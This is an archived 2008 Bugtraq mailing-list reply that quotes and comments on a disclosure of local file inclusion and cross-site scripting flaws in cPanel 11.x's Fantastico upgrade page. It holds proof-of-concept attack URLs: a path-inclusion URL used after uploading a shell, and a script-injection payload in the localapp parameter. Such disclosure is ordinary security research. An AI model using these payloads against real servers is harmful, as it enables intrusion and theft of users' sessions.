| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 20 Nov 2008 15:07:55 +0200 From: Jan van Niekerk <jvnkrk@...il.com> To: bugtraq@...urityfocus.com Cc: irancrash@...il.com Subject: Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani On Friday 31 October 2008 15:03:55 irancrash@...il.com wrote: > ---------------------------------------------------------------- > > Script : Cpanel 11.x > > Type : Local File Inclusion & Cross Site Scripting > > Risk : High > > ---------------------------------------------------------------- > > Discovered by : Khashayar Fereidani > > **** I am 17 Years Old **** Happy birthday to you. > > My Official Website : HTTP://FEREIDANI.IR > > Team Website : Http://IRCRASH.COM > > Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr > > Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com > > ---------------------------------------------------------------- > > Local File Inclusion Vulnerability : > > Note : Rename your shell to config.php and upload with your ftp account in > ./ directory .... , now login in cpanel and enter vulnerable address in url > .... > > > https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra >de.php?action=GoAhead&scriptpath_show=/home/[youruser]/ > > https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgra >de.php?action=GoAhead&scriptpath_show=/home/[youruser]/ > > https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrad >e.php?action=GoAhead&scriptpath_show=/home/[youruser]/ According to netenberg.com there is no prospect of privilege escalation here. On their forum http://www.netenberg.com/forum/index.php?topic=6832 they say: >> I do not see any reason as to why anyone would do this as they can already >> do the same via cPanel/SSH (this exploit will only work on the cPanel >> account of the person who wishes to use it; he/she cannot affect any other >> account on the server). I guess they feel similarly about the cross-site scripting. You can start embedding those links in spam to your administrator now. > ---------------------------------------------------------------- > > Cross site scripting : > > File Address : > frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade% >20to%201.7.4 > > Set Action as Upgrade%20to%201.7.4 > > Vulnerable Variables : > > $localapp > $updatedir > $scriptpath_show > $domain_show > $thispage > $thisapp > $currentversion > > For Example : > https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra >de.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)% >3C/script%3E
Powered by blists - more mailing lists